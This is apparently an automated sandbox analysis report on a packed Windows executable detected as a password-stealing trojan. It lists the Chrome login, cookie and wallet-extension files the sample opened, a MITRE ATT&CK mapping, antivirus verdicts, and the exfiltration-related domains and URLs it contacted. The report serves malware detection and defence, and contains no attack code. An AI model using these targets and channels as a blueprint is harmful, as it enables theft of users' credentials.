Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202\setuptools-65.5.0.dist-info VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67202 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	Queries volume information: C:\Users\user\Desktop\KzqQe0QtRd.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF7012889E0 cpuid

0_2_00007FF7012889E0

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF70126B5B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF70126B5B0

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe

Code function: 0_2_00007FF701284E50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF701284E50

Stealing of Sensitive Information

Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\KzqQe0QtRd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	11 Process Injection	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Timestomp	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	14 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KzqQe0QtRd.exe	42%	ReversingLabs	Win64.Trojan.Wasp
KzqQe0QtRd.exe	21%	Virustotal		Browse
KzqQe0QtRd.exe	100%	Avira	TR/PSW.Agent.gdafr

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_ARC4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_Salsa20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_chacha20.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_pkcs1_decode.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_aesni.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_arc2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_blowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cast.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cbc.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_cfb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ctr.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_des3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ecb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_eksblowfish.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ocb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Cipher\_raw_ofb.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2b.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_BLAKE2s.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD4.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_MD5.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_RIPEMD160.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA1.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA224.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA256.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA384.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_SHA512.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_clmul.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_ghash_portable.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_keccak.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Hash\_poly1305.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Math\_modexp.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Protocol\_scrypt.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ec_ws.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_ed448.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\PublicKey\_x25519.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_cpuid_c.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\Crypto\Util\_strxor.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md.cp311-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\libssl-3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\pyexpat.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pyd	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ptb.discord.com	0%	Virustotal		Browse
geolocation-db.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://blog.jaraco.com/skeleton	0%	URL Reputation	safe
http://crl.dhimyotis.com/certignarootca.crl	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/0m	0%	URL Reputation	safe
https://wwww.certigna.fr/autorites/	0%	URL Reputation	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
http://crl.securetrust.com/STCA.crl	0%	URL Reputation	safe
http://crl.xrampsecurity.com/XGCA.crl0	0%	URL Reputation	safe
http://www.accv.es00	0%	URL Reputation	safe
https://discord.com)z	0%	Avira URL Cloud	safe
http://schemas.m	0%	URL Reputation	safe
http://crl.securetrust.com/SGCA.crl	0%	URL Reputation	safe
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html	0%	URL Reputation	safe
https://ebay.com)z$	0%	Avira URL Cloud	safe
https://xbox.com)	0%	Avira URL Cloud	safe
https://disney.com)z$	0%	Avira URL Cloud	safe
https://twitch.com)z	0%	Avira URL Cloud	safe
https://gmail.com)z	0%	Avira URL Cloud	safe
http://crl.dhimyotis.com/certignarootca.crlP	0%	Avira URL Cloud	safe
https://superfurrycdn.nl/copy/	100%	Avira URL Cloud	malware
https://paypal.com)z	0%	Avira URL Cloud	safe
https://uber.com)z	0%	Avira URL Cloud	safe
https://coinbase.com)z	0%	Avira URL Cloud	safe
https://geolocation-db.com/jsonp/z	0%	Avira URL Cloud	safe
https://hbo.com)z	0%	Avira URL Cloud	safe
https://roblox.com)z	0%	Avira URL Cloud	safe
http://crl.securetrust.com/STCA.crlm	0%	Avira URL Cloud	safe
https://binance.com)z	0%	Avira URL Cloud	safe
http://crl.xrampsecurity.com/XGCA.crl%	0%	Avira URL Cloud	safe
https://twitter.com)z	0%	Avira URL Cloud	safe
http://crl.xrampsecurity.com/XGCA.crlF2	0%	Avira URL Cloud	safe
https://telegram.com)z	0%	Avira URL Cloud	safe
https://origin.com)z	0%	Avira URL Cloud	safe
https://tiktok.com)z	0%	Avira URL Cloud	safe
https://riotgames.com)z	0%	Avira URL Cloud	safe
https://playstation.com)z	0%	Avira URL Cloud	safe
https://pornhub.com)z	0%	Avira URL Cloud	safe
https://steam.com)z	0%	Avira URL Cloud	safe
https://mahler:8092/site-updates.py	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ptb.discord.com	162.159.137.232	true	false	0%, Virustotal, Browse	unknown
api4.ipify.org	173.231.16.76	true	false		high
geolocation-db.com	159.89.102.253	true	false	0%, Virustotal, Browse	unknown
api.gofile.io	51.38.43.18	true	false		high
api.ipify.org	unknown	unknown	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/pypa/packagingP	KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmp	false		high
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf	KzqQe0QtRd.exe, 00000001.00000003.289149538.00000221274B7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275987761.000002212748E000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276055923.00000221274A4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279714208.00000221274B5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://freezy01.ct8.pl/assets/js/index2.jsz=	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/badge/skeleton-2022-informational	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/pypi/pyversions/setuptools.svg	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://discord.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://img.shields.io/pypi/v/setuptools.svg	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ebay.com)z$	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://docs.python.org/library/unittest.html	KzqQe0QtRd.exe, 00000001.00000003.276808444.0000022126D85000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.292578153.0000022126DAD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	KzqQe0QtRd.exe, 00000001.00000003.215069241.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277631315.0000022126BE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220635622.0000022126BD4000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.277946058.0000022124D9F000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.220295817.0000022126BCD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.217947214.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216330714.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.214901072.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.216252989.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.219263959.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.276673991.0000022126BC7000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.294140587.0000022126BEC000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000002.296373170.0000022124DA1000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.218775357.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215741158.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215348853.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215954077.0000022126BDF000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.215502642.0000022124DFA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://repository.swisssign.com/7	KzqQe0QtRd.exe, 00000001.00000003.274467347.00000221281BD000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274415999.00000221281B4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/security	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2388#section-4.4	KzqQe0QtRd.exe, 00000001.00000003.275180849.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.274367842.0000022127D72000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279856273.0000022127D72000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	KzqQe0QtRd.exe, 00000001.00000003.277774285.0000022126B65000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.279424780.0000022126B75000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288232938.0000022126B7B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/codecov/c/github/pypa/setuptools/master.svg?logo=codecov&logoColor=white	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://disney.com)z$	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://github.com/pypa/packaging	KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://refspecs.linuxfoundation.org/elf/gabi4	KzqQe0QtRd.exe, 00000001.00000002.298654222.0000022127760000.00000004.00001000.00020000.00000000.sdmp	false		high
https://pypi.org/project/setuptools	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/workflows/tests/badge.svg	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.dhimyotis.com/certignarootca.crlP	KzqQe0QtRd.exe, 00000001.00000003.295661249.0000022127EE9000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.275479991.0000022127EE5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xbox.com)	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp, KzqQe0QtRd.exe, 00000001.00000003.288460075.0000022127E73000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://blog.jaraco.com/skeleton	KzqQe0QtRd.exe, 00000000.00000003.213427076.000001EF2EB54000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://twitch.com)z	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/963114349877162004/992593184251183195/7c8f476123d28d103efe381	KzqQe0QtRd.exe, 00000001.00000003.274150867.0000022127E68000.00000004.00000020.00020000.00000000.sdmp	false		high
